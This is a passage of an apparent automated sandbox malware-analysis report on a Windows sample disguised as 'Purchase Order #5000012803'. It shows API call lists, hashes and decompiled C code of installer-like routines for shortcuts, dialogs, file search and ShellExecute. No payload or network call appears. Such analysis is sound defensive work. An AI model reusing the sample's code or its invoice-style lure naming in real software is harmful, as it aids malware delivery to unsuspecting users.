                      • lstrcatA.KERNEL32(icluciob,\Microsoft\Internet Explorer\Quick Launch), ref: 00405C50
                      • lstrlenA.KERNEL32(icluciob,?,0041FC70,00000000,00404E5B,0041FC70,00000000), ref: 00405CA2
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.668267382.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.668257889.0000000000400000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.668301955.0000000000407000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.668309433.0000000000409000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668371508.0000000000422000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668375561.0000000000429000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668384083.000000000042C000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                      • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$icluciob
                      • API String ID: 900638850-73990308
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 74%
                      			E00402012() {
                      				void* _t44;
                      				intOrPtr* _t48;
                      				intOrPtr* _t50;
                      				intOrPtr* _t52;
                      				intOrPtr* _t54;
                      				signed int _t58;
                      				intOrPtr* _t59;
                      				intOrPtr* _t62;
                      				intOrPtr* _t64;
                      				intOrPtr* _t66;
                      				intOrPtr* _t69;
                      				intOrPtr* _t71;
                      				int _t75;
                      				signed int _t81;
                      				intOrPtr* _t88;
                      				void* _t95;
                      				void* _t96;
                      				void* _t100;
                      
                      				 *(_t100 - 0x30) = E004029E8(0xfffffff0);
                      				_t96 = E004029E8(0xffffffdf);
                      				 *((intOrPtr*)(_t100 - 0x2c)) = E004029E8(2);
                      				 *((intOrPtr*)(_t100 - 8)) = E004029E8(0xffffffcd);
                      				 *((intOrPtr*)(_t100 - 0x44)) = E004029E8(0x45);
                      				if(E004055E5(_t96) == 0) {
                      					E004029E8(0x21);
                      				}
                      				_t44 = _t100 + 8;
                      				__imp__CoCreateInstance(0x407384, _t75, 1, 0x407374, _t44);
                      				if(_t44 < _t75) {
                      					L13:
                      					 *((intOrPtr*)(_t100 - 4)) = 1;
                      					_push(0xfffffff0);
                      				} else {
                      					_t48 =  *((intOrPtr*)(_t100 + 8));
                      					_t95 =  *((intOrPtr*)( *_t48))(_t48, 0x407394, _t100 - 0x34);
                      					if(_t95 >= _t75) {
                      						_t52 =  *((intOrPtr*)(_t100 + 8));
                      						_t95 =  *((intOrPtr*)( *_t52 + 0x50))(_t52, _t96);
                      						_t54 =  *((intOrPtr*)(_t100 + 8));
                      						 *((intOrPtr*)( *_t54 + 0x24))(_t54, "C:\\Users\\jones\\AppData\\Local\\Temp");
                      						_t81 =  *(_t100 - 0x14);
                      						_t58 = _t81 >> 0x00000008 & 0x000000ff;
                      						if(_t58 != 0) {
                      							_t88 =  *((intOrPtr*)(_t100 + 8));
                      							 *((intOrPtr*)( *_t88 + 0x3c))(_t88, _t58);
                      							_t81 =  *(_t100 - 0x14);
                      						}
                      						_t59 =  *((intOrPtr*)(_t100 + 8));
                      						 *((intOrPtr*)( *_t59 + 0x34))(_t59, _t81 >> 0x10);
                      						if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 8)))) != _t75) {
                      							_t71 =  *((intOrPtr*)(_t100 + 8));
                      							 *((intOrPtr*)( *_t71 + 0x44))(_t71,  *((intOrPtr*)(_t100 - 8)),  *(_t100 - 0x14) & 0x000000ff);
                      						}
                      						_t62 =  *((intOrPtr*)(_t100 + 8));
                      						 *((intOrPtr*)( *_t62 + 0x2c))(_t62,  *((intOrPtr*)(_t100 - 0x2c)));
                      						_t64 =  *((intOrPtr*)(_t100 + 8));
                      						 *((intOrPtr*)( *_t64 + 0x1c))(_t64,  *((intOrPtr*)(_t100 - 0x44)));
                      						if(_t95 >= _t75) {
                      							_t95 = 0x80004005;
                      							if(MultiByteToWideChar(_t75, _t75,  *(_t100 - 0x30), 0xffffffff, 0x409360, 0x400) != 0) {
                      								_t69 =  *((intOrPtr*)(_t100 - 0x34));
                      								_t95 =  *((intOrPtr*)( *_t69 + 0x18))(_t69, 0x409360, 1);
                      							}
                      						}
                      						_t66 =  *((intOrPtr*)(_t100 - 0x34));
                      						 *((intOrPtr*)( *_t66 + 8))(_t66);
                      					}
                      					_t50 =  *((intOrPtr*)(_t100 + 8));
                      					 *((intOrPtr*)( *_t50 + 8))(_t50);
                      					if(_t95 >= _t75) {
                      						_push(0xfffffff4);
                      					} else {
                      						goto L13;
                      					}
                      				}
                      				E00401423();
                      				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t100 - 4));
                      				return 0;
                      			}

                      APIs
                      • CoCreateInstance.OLE32(00407384,?,00000001,00407374,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402065
                      • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409360,00000400,?,00000001,00407374,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040211F
                      Strings
                      • C:\Users\user\AppData\Local\Temp, xrefs: 0040209D
                      Memory Dump Source
                      • Source File: 00000000.00000002.668267382.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.668257889.0000000000400000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.668301955.0000000000407000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.668309433.0000000000409000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668371508.0000000000422000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668375561.0000000000429000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668384083.000000000042C000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID: ByteCharCreateInstanceMultiWide
                      • String ID: C:\Users\user\AppData\Local\Temp
                      • API String ID: 123533781-47812868
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 39%
                      			E00402630(char __ebx, char* __edi, char* __esi) {
                      				void* _t19;
                      
                      				if(FindFirstFileA(E004029E8(2), _t19 - 0x1a4) != 0xffffffff) {
                      					E004059E3(__edi, _t6);
                      					_push(_t19 - 0x178);
                      					_push(__esi);
                      					E00405A85();
                      				} else {
                      					 *__edi = __ebx;
                      					 *__esi = __ebx;
                      					 *((intOrPtr*)(_t19 - 4)) = 1;
                      				}
                      				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t19 - 4));
                      				return 0;
                      			}

                      APIs
                      • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 0040263F
                      Memory Dump Source
                      • Source File: 00000000.00000002.668267382.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.668257889.0000000000400000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.668301955.0000000000407000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.668309433.0000000000409000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668371508.0000000000422000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668375561.0000000000429000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668384083.000000000042C000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID: FileFindFirst
                      • String ID:
                      • API String ID: 1974802433-0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000000.00000002.668197587.000000000019E000.00000040.00000001.sdmp, Offset: 0019E000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_19e000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000000.00000002.668197587.000000000019E000.00000040.00000001.sdmp, Offset: 0019E000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_19e000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: f4324828f627b6bb0fb9c77ef1135b1a25c16c170ba8a3c28242676e39d3c830
                      • Instruction ID: fb59054831deea4ada637f275142889febe5fdb440057b8478201c423f496885
                      • Opcode Fuzzy Hash: f4324828f627b6bb0fb9c77ef1135b1a25c16c170ba8a3c28242676e39d3c830
                      • Instruction Fuzzy Hash: 3211C231A10109AFCF20DBAAD8888AEF7FDFF54790B5440A9E805D7220E734DE40C660
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000000.00000002.668197587.000000000019E000.00000040.00000001.sdmp, Offset: 0019E000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_19e000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 16547e1fdedecc12c00c52f4e517689794c9225d74c133a4488530a871c9f38f
                      • Instruction ID: 108ca85d9979560b7ff8b10316963a28ececdd21001ad81d07d897b98ce2aa61
                      • Opcode Fuzzy Hash: 16547e1fdedecc12c00c52f4e517689794c9225d74c133a4488530a871c9f38f
                      • Instruction Fuzzy Hash: 1DE01A35764609DFCB58CBA8C981D25B3F8EB19330B154694F817CB7A1EB34EE00DA50
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000000.00000002.668197587.000000000019E000.00000040.00000001.sdmp, Offset: 0019E000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_19e000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 2c0ee92d967234240d1aeaee57440cb1fca394a3c7c5a1b28cb5c43ac66d8783
                      • Instruction ID: d548ee57416b52d8455906cb494683c26669be03c2944f8d1a824a6414de9bff
                      • Opcode Fuzzy Hash: 2c0ee92d967234240d1aeaee57440cb1fca394a3c7c5a1b28cb5c43ac66d8783
                      • Instruction Fuzzy Hash: 7FE08C323205108FCB30DA19D480896F3E9FBD83B171A486AE98BD3711C730FC008690
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Memory Dump Source
                      • Source File: 00000000.00000002.668197587.000000000019E000.00000040.00000001.sdmp, Offset: 0019E000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_19e000_Purchase Order #5000012803.jbxd
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 83%
                      			E00403964(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
                      				struct HWND__* _v32;
                      				void* _v84;
                      				void* _v88;
                      				void* __ebx;
                      				void* __edi;
                      				void* __esi;
                      				signed int _t35;
                      				signed int _t37;
                      				signed int _t39;
                      				struct HWND__* _t49;
                      				signed int _t67;
                      				struct HWND__* _t73;
                      				signed int _t86;
                      				struct HWND__* _t91;
                      				signed int _t99;
                      				int _t103;
                      				signed int _t115;
                      				signed int _t116;
                      				int _t117;
                      				signed int _t122;
                      				struct HWND__* _t125;
                      				struct HWND__* _t126;
                      				int _t127;
                      				long _t130;
                      				int _t132;
                      				int _t133;
                      				void* _t134;
                      
                      				_t115 = _a8;
                      				if(_t115 == 0x110 || _t115 == 0x408) {
                      					_t35 = _a12;
                      					_t125 = _a4;
                      					__eflags = _t115 - 0x110;
                      					 *0x42047c = _t35;
                      					if(_t115 == 0x110) {
                      						 *0x423ea8 = _t125;
                      						 *0x420490 = GetDlgItem(_t125, 1);
                      						_t91 = GetDlgItem(_t125, 2);
                      						_push(0xffffffff);
                      						_push(0x1c);
                      						 *0x41f458 = _t91;
                      						E00403E37(_t125);
                      						SetClassLongA(_t125, 0xfffffff2,  *0x423688);
                      						 *0x42366c = E0040140B(4);
                      						_t35 = 1;
                      						__eflags = 1;
                      						 *0x42047c = 1;
                      					}
                      					_t122 =  *0x4091bc; // 0xffffffff
                      					_t133 = 0;
                      					_t130 = (_t122 << 6) +  *0x423ec0;
                      					__eflags = _t122;
                      					if(_t122 < 0) {
                      						L34:
                      						E00403E83(0x40b);
                      						while(1) {
                      							_t37 =  *0x42047c;
                      							 *0x4091bc =  *0x4091bc + _t37;
                      							_t130 = _t130 + (_t37 << 6);
                      							_t39 =  *0x4091bc; // 0xffffffff
                      							__eflags = _t39 -  *0x423ec4;
                      							if(_t39 ==  *0x423ec4) {
                      								E0040140B(1);
                      							}
                      							__eflags =  *0x42366c - _t133;
                      							if( *0x42366c != _t133) {
                      								break;
                      							}
                      							__eflags =  *0x4091bc -  *0x423ec4; // 0xffffffff
                      							if(__eflags >= 0) {
                      								break;
                      							}
                      							_t116 =  *(_t130 + 0x14);
                      							E00405AA7(_t116, _t125, _t130, 0x42b800,  *((intOrPtr*)(_t130 + 0x24)));
                      							_push( *((intOrPtr*)(_t130 + 0x20)));
                      							_push(0xfffffc19);
                      							E00403E37(_t125);
                      							_push( *((intOrPtr*)(_t130 + 0x1c)));
                      							_push(0xfffffc1b);
                      							E00403E37(_t125);
                      							_push( *((intOrPtr*)(_t130 + 0x28)));
                      							_push(0xfffffc1a);
                      							E00403E37(_t125);
                      							_t49 = GetDlgItem(_t125, 3);
                      							__eflags =  *0x423f2c - _t133;
                      							_v32 = _t49;
                      							if( *0x423f2c != _t133) {
                      								_t116 = _t116 & 0x0000fefd | 0x00000004;
                      								__eflags = _t116;
                      							}
                      							ShowWindow(_t49, _t116 & 0x00000008);
                      							EnableWindow( *(_t134 + 0x30), _t116 & 0x00000100);
                      							E00403E59(_t116 & 0x00000002);
                      							_t117 = _t116 & 0x00000004;
                      							EnableWindow( *0x41f458, _t117);
                      							__eflags = _t117 - _t133;
                      							if(_t117 == _t133) {
                      								_push(1);
                      							} else {
                      								_push(_t133);
                      							}
                      							EnableMenuItem(GetSystemMenu(_t125, _t133), 0xf060, ??);
                      							SendMessageA( *(_t134 + 0x38), 0xf4, _t133, 1);
                      							__eflags =  *0x423f2c - _t133;
                      							if( *0x423f2c == _t133) {
                      								_push( *0x420490);
                      							} else {
                      								SendMessageA(_t125, 0x401, 2, _t133);
                      								_push( *0x41f458);
                      							}
                      							E00403E6C();
                      							E00405A85(0x420498, 0x4236a0);
                      							E00405AA7(0x420498, _t125, _t130,  &(0x420498[lstrlenA(0x420498)]),  *((intOrPtr*)(_t130 + 0x18)));
                      							SetWindowTextA(_t125, 0x420498);
                      							_push(_t133);
                      							_t67 = E00401389( *((intOrPtr*)(_t130 + 8)));
                      							__eflags = _t67;
                      							if(_t67 != 0) {
                      								continue;
                      							} else {
                      								__eflags =  *_t130 - _t133;
                      								if( *_t130 == _t133) {
                      									continue;
                      								}
                      								__eflags =  *(_t130 + 4) - 5;
                      								if( *(_t130 + 4) != 5) {
                      									DestroyWindow( *0x423678);
                      									 *0x41fc68 = _t130;
                      									__eflags =  *_t130 - _t133;
                      									if( *_t130 <= _t133) {
                      										goto L58;
                      									}
                      									_t73 = CreateDialogParamA( *0x423ea0,  *_t130 +  *0x423680 & 0x0000ffff, _t125,  *(0x4091c0 +  *(_t130 + 4) * 4), _t130);
                      									__eflags = _t73 - _t133;
                      									 *0x423678 = _t73;
                      									if(_t73 == _t133) {
                      										goto L58;
                      									}
                      									_push( *((intOrPtr*)(_t130 + 0x2c)));
                      									_push(6);
                      									E00403E37(_t73);
                      									GetWindowRect(GetDlgItem(_t125, 0x3fa), _t134 + 0x10);
                      									ScreenToClient(_t125, _t134 + 0x10);
                      									SetWindowPos( *0x423678, _t133,  *(_t134 + 0x20),  *(_t134 + 0x20), _t133, _t133, 0x15);
                      									_push(_t133);
                      									E00401389( *((intOrPtr*)(_t130 + 0xc)));
                      									__eflags =  *0x42366c - _t133;
                      									if( *0x42366c != _t133) {
                      										goto L61;
                      									}
                      									ShowWindow( *0x423678, 8);
                      									E00403E83(0x405);
                      									goto L58;
                      								}
                      								__eflags =  *0x423f2c - _t133;
                      								if( *0x423f2c != _t133) {
                      									goto L61;
                      								}
                      								__eflags =  *0x423f20 - _t133;
                      								if( *0x423f20 != _t133) {
                      									continue;
                      								}
                      								goto L61;
                      							}
                      						}
                      						DestroyWindow( *0x423678);
                      						 *0x423ea8 = _t133;
                      						EndDialog(_t125,  *0x41f860);
                      						goto L58;
                      					} else {
                      						__eflags = _t35 - 1;
                      						if(_t35 != 1) {
                      							L33:
                      							__eflags =  *_t130 - _t133;
                      							if( *_t130 == _t133) {
                      								goto L61;
                      							}
                      							goto L34;
                      						}
                      						_push(0);
                      						_t86 = E00401389( *((intOrPtr*)(_t130 + 0x10)));
                      						__eflags = _t86;
                      						if(_t86 == 0) {
                      							goto L33;
                      						}
                      						SendMessageA( *0x423678, 0x40f, 0, 1);
                      						__eflags =  *0x42366c;
                      						return 0 |  *0x42366c == 0x00000000;
                      					}
                      				} else {
                      					_t125 = _a4;
                      					_t133 = 0;
                      					if(_t115 == 0x47) {
                      						SetWindowPos( *0x420470, _t125, 0, 0, 0, 0, 0x13);
                      					}
                      					if(_t115 == 5) {
                      						asm("sbb eax, eax");
                      						ShowWindow( *0x420470,  ~(_a12 - 1) & _t115);
                      					}
                      					if(_t115 != 0x40d) {
                      						__eflags = _t115 - 0x11;
                      						if(_t115 != 0x11) {
                      							__eflags = _t115 - 0x111;
                      							if(_t115 != 0x111) {
                      								L26:
                      								return E00403E9E(_t115, _a12, _a16);
                      							}
                      							_t132 = _a12 & 0x0000ffff;
                      							_t126 = GetDlgItem(_t125, _t132);
                      							__eflags = _t126 - _t133;
                      							if(_t126 == _t133) {
                      								L13:
                      								__eflags = _t132 - 1;
                      								if(_t132 != 1) {
                      									__eflags = _t132 - 3;
                      									if(_t132 != 3) {
                      										_t127 = 2;
                      										__eflags = _t132 - _t127;
                      										if(_t132 != _t127) {
                      											L25:
                      											SendMessageA( *0x423678, 0x111, _a12, _a16);
                      											goto L26;
                      										}
                      										__eflags =  *0x423f2c - _t133;
                      										if( *0x423f2c == _t133) {
                      											_t99 = E0040140B(3);
                      											__eflags = _t99;
                      											if(_t99 != 0) {
                      												goto L26;
                      											}
                      											 *0x41f860 = 1;
                      											L21:
                      											_push(0x78);
                      											L22:
                      											E00403E10();
                      											goto L26;
                      										}
                      										E0040140B(_t127);
                      										 *0x41f860 = _t127;
                      										goto L21;
                      									}
                      									__eflags =  *0x4091bc - _t133; // 0xffffffff
                      									if(__eflags <= 0) {
                      										goto L25;
                      									}
                      									_push(0xffffffff);
                      									goto L22;
                      								}
                      								_push(_t132);
                      								goto L22;
                      							}
                      							SendMessageA(_t126, 0xf3, _t133, _t133);
                      							_t103 = IsWindowEnabled(_t126);
                      							__eflags = _t103;
                      							if(_t103 == 0) {
                      								goto L61;
                      							}
                      							goto L13;
                      						}
                      						SetWindowLongA(_t125, _t133, _t133);
                      						return 1;
                      					} else {
                      						DestroyWindow( *0x423678);
                      						 *0x423678 = _a12;
                      						L58:
                      						if( *0x421498 == _t133 &&  *0x423678 != _t133) {
                      							ShowWindow(_t125, 0xa);
                      							 *0x421498 = 1;
                      						}
                      						L61:
                      						return 0;
                      					}
                      				}
                      			}

                      APIs
                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004039A0
                      • ShowWindow.USER32(?), ref: 004039BD
                      • DestroyWindow.USER32 ref: 004039D1
                      • SetWindowLongA.USER32 ref: 004039ED
                      • GetDlgItem.USER32 ref: 00403A0E
                      • SendMessageA.USER32 ref: 00403A22
                      • IsWindowEnabled.USER32(00000000), ref: 00403A29
                      • GetDlgItem.USER32 ref: 00403AD7
                      • GetDlgItem.USER32 ref: 00403AE1
                      • SetClassLongA.USER32(?,000000F2,?,0000001C,000000FF), ref: 00403AFB
                      • SendMessageA.USER32 ref: 00403B4C
                      • GetDlgItem.USER32 ref: 00403BF2
                      • ShowWindow.USER32(00000000,?), ref: 00403C13
                      • EnableWindow.USER32(?,?), ref: 00403C25
                      • EnableWindow.USER32(?,?), ref: 00403C40
                      • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403C56
                      • EnableMenuItem.USER32 ref: 00403C5D
                      • SendMessageA.USER32 ref: 00403C75
                      • SendMessageA.USER32 ref: 00403C88
                      • lstrlenA.KERNEL32(00420498,?,00420498,004236A0), ref: 00403CB1
                      • SetWindowTextA.USER32(?,00420498), ref: 00403CC0
                      • ShowWindow.USER32(?,0000000A), ref: 00403DF4
                      Memory Dump Source
                      • Source File: 00000000.00000002.668267382.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.668257889.0000000000400000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.668301955.0000000000407000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.668309433.0000000000409000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668371508.0000000000422000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668375561.0000000000429000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668384083.000000000042C000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                      • String ID:
                      • API String ID: 184305955-0
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 93%
                      			E00403F7F(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
                      				char _v8;
                      				signed int _v12;
                      				void* _v16;
                      				struct HWND__* _t52;
                      				long _t86;
                      				int _t98;
                      				struct HWND__* _t99;
                      				signed int _t100;
                      				intOrPtr _t103;
                      				intOrPtr _t109;
                      				int _t110;
                      				signed int* _t112;
                      				signed int _t113;
                      				char* _t114;
                      				CHAR* _t115;
                      
                      				if(_a8 != 0x110) {
                      					if(_a8 != 0x111) {
                      						L11:
                      						if(_a8 != 0x4e) {
                      							if(_a8 == 0x40b) {
                      								 *0x420478 =  *0x420478 + 1;
                      							}
                      							L25:
                      							_t110 = _a16;
                      							L26:
                      							return E00403E9E(_a8, _a12, _t110);
                      						}
                      						_t52 = GetDlgItem(_a4, 0x3e8);
                      						_t110 = _a16;
                      						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
                      							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
                      							_t109 =  *((intOrPtr*)(_t110 + 0x18));
                      							_v12 = _t100;
                      							_v16 = _t109;
                      							_v8 = 0x422e40;
                      							if(_t100 - _t109 < 0x800) {
                      								SendMessageA(_t52, 0x44b, 0,  &_v16);
                      								SetCursor(LoadCursorA(0, 0x7f02));
                      								_t40 =  &_v8; // 0x422e40
                      								ShellExecuteA(_a4, "open",  *_t40, 0, 0, 1);
                      								SetCursor(LoadCursorA(0, 0x7f00));
                      								_t110 = _a16;
                      							}
                      						}
                      						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
                      							goto L26;
                      						} else {
                      							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
                      								SendMessageA( *0x423ea8, 0x111, 1, 0);
                      							}
                      							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
                      								SendMessageA( *0x423ea8, 0x10, 0, 0);
                      							}
                      							return 1;
                      						}
                      					}
                      					if(_a12 >> 0x10 != 0 ||  *0x420478 != 0) {
                      						goto L25;
                      					} else {
                      						_t103 =  *0x41fc68; // 0x0
                      						_t25 = _t103 + 0x14; // 0x14
                      						_t112 = _t25;
                      						if(( *_t112 & 0x00000020) == 0) {
                      							goto L25;
                      						}
                      						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
                      						E00403E59(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
                      						E0040420A();
                      						goto L11;
                      					}
                      				}
                      				_t98 = _a16;
                      				_t113 =  *(_t98 + 0x30);
                      				if(_t113 < 0) {
                      					_t113 =  *( *0x42367c - 4 + _t113 * 4);
                      				}
                      				_push( *((intOrPtr*)(_t98 + 0x34)));
                      				_t114 = _t113 +  *0x423ed8;
                      				_push(0x22);
                      				_a16 =  *_t114;
                      				_v12 = _v12 & 0x00000000;
                      				_t115 = _t114 + 1;
                      				_v16 = _t115;
                      				_v8 = E00403F4B;
                      				E00403E37(_a4);
                      				_push( *((intOrPtr*)(_t98 + 0x38)));
                      				_push(0x23);
                      				E00403E37(_a4);
                      				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
                      				E00403E59( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
                      				_t99 = GetDlgItem(_a4, 0x3e8);
                      				E00403E6C(_t99);
                      				SendMessageA(_t99, 0x45b, 1, 0);
                      				_t86 =  *( *0x423eb0 + 0x68);
                      				if(_t86 < 0) {
                      					_t86 = GetSysColor( ~_t86);
                      				}
                      				SendMessageA(_t99, 0x443, 0, _t86);
                      				SendMessageA(_t99, 0x445, 0, 0x4010000);
                      				 *0x41f45c =  *0x41f45c & 0x00000000;
                      				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
                      				SendMessageA(_t99, 0x449, _a16,  &_v16);
                      				 *0x420478 =  *0x420478 & 0x00000000;
                      				return 0;
                      			}

                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.668267382.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.668257889.0000000000400000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.668301955.0000000000407000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.668309433.0000000000409000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668371508.0000000000422000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668375561.0000000000429000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.668384083.000000000042C000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Purchase Order #5000012803.jbxd
                      Similarity
                      • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                      • String ID: @.B$N$open
                      • API String ID: 3615053054-3815657624
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 90%
                      			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                      				struct tagLOGBRUSH _v16;
                      				struct tagRECT _v32;
                      				struct tagPAINTSTRUCT _v96;
                      				struct HDC__* _t70;
                      				struct HBRUSH__* _t87;
                      				struct HFONT__* _t94;
                      				long _t102;
                      				signed int _t126;
                      				struct HDC__* _t128;
                      				intOrPtr _t130;
                      
                      				if(_a8 == 0xf) {
                      					_t130 =  *0x423eb0;
                      					_t70 = BeginPaint(_a4,  &_v96);
                      					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                      					_a8 = _t70;
                      					GetClientRect(_a4,  &_v32);
                      					_t126 = _v32.bottom;
                      					_v32.bottom = _v32.bottom & 0x00000000;
                      					while(_v32.top < _t126) {
                      						_a12 = _t126 - _v32.top;
                      						asm("cdq");
                      						asm("cdq");
                      						asm("cdq");
                      						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                      						_t87 = CreateBrushIndirect( &_v16);
                      						_v32.bottom = _v32.bottom + 4;
                      						_a16 = _t87;
                      						FillRect(_a8,  &_v32, _t87);
                      						DeleteObject(_a16);
                      						_v32.top = _v32.top + 4;
                      					}
                      					if( *(_t130 + 0x58) != 0xffffffff) {
                      						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
                      						_a16 = _t94;
                      						if(_t94 != 0) {
                      							_t128 = _a8;
                      							_v32.left = 0x10;
                      							_v32.top = 8;
                      							SetBkMode(_t128, 1);
                      							SetTextColor(_t128,  *(_t130 + 0x58));
                      							_a8 = SelectObject(_t128, _a16);
                      							DrawTextA(_t128, 0x4236a0, 0xffffffff,  &_v32, 0x820);
                      							SelectObject(_t128, _a8);
                      							DeleteObject(_a16);
                      						}
                      					}
                      					EndPaint(_a4,  &_v96);
                      					return 0;
                      				}
                      				_t102 = _a16;
                      				if(_a8 == 0x46) {
                      					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                      					 *((intOrPtr*)(_t102 + 4)) =  *0x423ea8;
                      				}
                      				return DefWindowProcA(_a4, _a8, _a12, _t102);
                      			}

                      APIs
                      • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                      • BeginPaint.USER32(?,?), ref: 00401047
                      • GetClientRect.USER32 ref: 0040105B
                      • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                      • FillRect.USER32 ref: 004010E4
                      • DeleteObject.GDI32(?), ref: 004010ED
                      • CreateFontIndirectA.GDI32(?), ref: 00401105
                      • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                      • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                      • SelectObject.GDI32(00000000,?), ref: 00401140
